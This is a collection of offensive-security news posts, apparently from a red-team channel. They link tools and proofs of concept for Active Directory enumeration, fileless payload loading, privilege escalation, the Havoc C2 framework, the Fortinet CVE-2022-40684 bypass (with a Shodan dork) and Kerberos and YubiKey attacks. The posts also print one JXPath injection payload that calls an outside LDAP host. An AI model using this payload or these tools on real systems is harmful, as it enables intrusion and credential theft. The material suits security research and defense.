Azure Threat Research Matrix

The purpose of the Azure Threat Research Matrix is to conceptualize the known TTP that adversaries may use against Azure

https://microsoft.github.io/Azure-Threat-Research-Matrix/

#azure #ttp #blueteam

🤤 LDAP Nom Nom

Stuck on a network with no credentials?
No worry, you can anonymously bruteforce Active Directory controllers for usernames over LDAP Pings (cLDAP) using new tool - with parallelization you'll get 10K usernames/sec. No Windows audit logs generated.

Features:
— Tries to autodetect DC from environment variables on domain joined machines or falls back to machine hostname FDQN DNS suffix
— Reads usernames to test from stdin (default) or file
— Outputs to stdout (default) or file
— Parallelized (defaults to 8 connections)
— Shows progressbar if you're using both input and output files

https://github.com/lkarlslund/ldapnomnom

#ad #ldap #userenum #tools

🎲 Fileless Remote PE

Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique

https://github.com/D1rkMtr/FilelessRemotePE

#maldev #evasion #fileless #pe

Just another Windows Local Privilege Escalation from Service Account to System. Full details at

https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/

POC:
https://github.com/antonioCoco/JuicyPotatoNG

📞 Persistence on Skype for Business

This article provides a tool for Red Teams helping to achieve persistence on the latest patched version of Skype for Business 2019 server using a new method.

https://frycos.github.io/vulns4free/2022/09/22/skype-audit-part1.html

#ad #skype #persistence #redteam

Havoc is a modern and malleable post-exploitation command and control framework

Features:
Client
- Modern, dark theme based on Dracula
Teamserver
- Multiplayer
- Payload generation (exe/shellcode/dll)
- HTTP/HTTPS listeners
- Customizable C2 profiles
- External C2
Demon
- Sleep Obfuscation via Ekko or FOLIAGE
- x64 return address spoofing
- Indirect Syscalls for Nt* APIs
- SMB support
- Token vault
- Variety of built-in post-exploitation commands

😈 [ pdiscoveryio, ProjectDiscovery.io ]

The Ultimate Guide to Finding Bugs With Nuclei by @v3natoris

https://t.co/2GY3QZlTft

#hackwithautomation #cybersecurity #infosec #bugbounty

🔗 https://blog.projectdiscovery.io/ultimate-nuclei-guide/

🐥 [ tweet ]

😈 Fortinet RCE (CVE-2022-40684)

Fortinet recently patched a critical authentication bypass vulnerability in their FortiOS, FortiProxy, and FortiSwitchManager projects (CVE-2022-40684). This vulnerability gives an attacker the ability to login as an administrator on the affected system.

Shodan Dork:
product:"Fortinet FortiGate"

Research:
https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/

PoC:
https://github.com/horizon3ai/CVE-2022-40684

Detection for SOC:
https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/

#fortinet #rce #research #poc #exploit

⌛ Attacking Predictable GUID

Few penetration testers and bug bounty hunters are aware of the different versions of GUIDs and the security issues associated with using the wrong one. In this blog post walk through an account takeover issue from a recent penetration test where GUIDs were used as password reset tokens.

https://www.intruder.io/research/in-guid-we-trust

#web #pentest #guid #account #takeover

📄 Detecting ADCS Web Services Abuse (ESC8)

One of the popular attack vectors against Active Directory Certificate Services is ESC8. This article covers detecting irregular access to some ADCS web services exposed, as well as detecting the NTLM relaying itself.

https://medium.com/falconforce/falconfriday-detecting-adcs-web-services-abuse-0xff20-9f660c83cb36

#adcs #detection #esc8 #blueteam

🔑 YubiKeys Relaying Attack

That is, the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication. This attack works on all PIV Smart Cards.

Research:
Relaying YubiKeys Part 1
Relaying YubiKeys Part 2

Tools:
https://github.com/cube0x0/YubiKey-Relay

#ad #2fa #fido2 #ybikeys

😈 [ dafthack, Beau Bullock ]

Finding cleartext creds in AD user attributes is something that happens more than most might think. Great demo John! Here's a 1-liner to find these while leveraging PowerView:
https://t.co/ZItkN8BjZ9
And here's one for Azure AD:
https://t.co/IcCHRYPrE5

🔗 https://gist.github.com/dafthack/5f8c36f7468fad991e9e1f6d81ec29d4

🐥 [ tweet ][ quote ]

⚙️ Apache Commons Jxpath (CVE-2022-41852)

This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #commons #jxpath #cve #exploit

🌀 Unique Subdomain Enumeration

Great research regarding subdomain enumeration through permutations, unique approach that can provide good results with a smaller initial bruteforce data set in comparison to altdns

Research:
https://cramppet.github.io/regulator/index.html

Tools:
https://github.com/cramppet/regulator

#subdomain #enumeration #permutation #tools

Phishing campaigns

Сделал github репозиторий, в котором представлены разборы/отчёты об фишинговых кампаниях APT группировок, которые содержат пример писем, с помощью которого осуществлялась рассылка. Зачастую разборы атак APT группировок не содержат примеры писем, это побудило меня создать репозиторий в котором будут отчёты/разборы, которые точно содержат фишинговое письмо. Постепенно данный список будет пополняться

Link: https://github.com/wddadk/Phishing-campaigns

#apt #git #phishing

🔑 Abuse Kerberos RC4 (CVE-2022-33679)

This blog post goes into detail on how Windows Kerberos Elevation of Privilege vulnerability works and how to force Kerberos to downgrade the encoding from the default AES encryption to the historical MD4-RC4. The vulnerability could allows an attacker to obtain an authenticated session on behalf of the victim and also lead to arbitrary code execution.

Research:
https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html

Exploit:
https://github.com/Bdenneu/CVE-2022-33679

#ad #kerberos #rc4 #exploit

⚔️ Katana — Web Crawler

A next-generation crawling and spidering framework.

Features:
— Standard/Headless
— Customizable Config
— JavaScript parsing
— Scope control

https://github.com/projectdiscovery/katana

#web #crawler #tools #bugbounty

Bash Aliases for CrackMapExec Modules

CrackMapExec has one of the coolest features - "Audit Mode". This features makes life easier for a pentester by masking the password in the CME output. However, most often a pentester needs this functionality only as a one-time action, take a screenshot and disable it. That's why I wrote a simple Bash Alias that allows you to turn "Audit Mode" on and off with a single command.

As a bonus, I've implemented an Alias for the bh_owned module. This can be useful if you haven't received a BloodHound dump yet and a module error is annoys you.

Just include these lines in your ~/.zshrc or ~/.bashrc and enjoy.

Aliases:
alias CMEOwned='awk '\''/bh_enabled/{ if ($3=="False") {$3="True"} else {$3="False"}; {if($3=="True") {print "\033[1;92m" "[+] BloodHound Owned: "$3} else print "\033[1;91m" "[-] BloodHound Owned: "$3}} {print > FILENAME }'\'' /root/.cme/cme.conf'

alias CMEAudit='awk '\''/audit_mode/{ if ($3=="") {$3="*"} else {$3=""} {if($3==""){print "\033[1;92m" "[+] Audit Mode: Enable"} else print "\033[1;91m" "[-] Audit Mode: Disable"}} {print > FILENAME }'\'' /root/.cme/cme.conf'

#cme #bash #alias #bloodhound #audit #masking

⚙️ Psudohash — Password List Generator For Orchestrating Brute Force Attacks

This is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more.

https://github.com/t3l3machus/psudohash

#wordlist #password #generator #bruteforce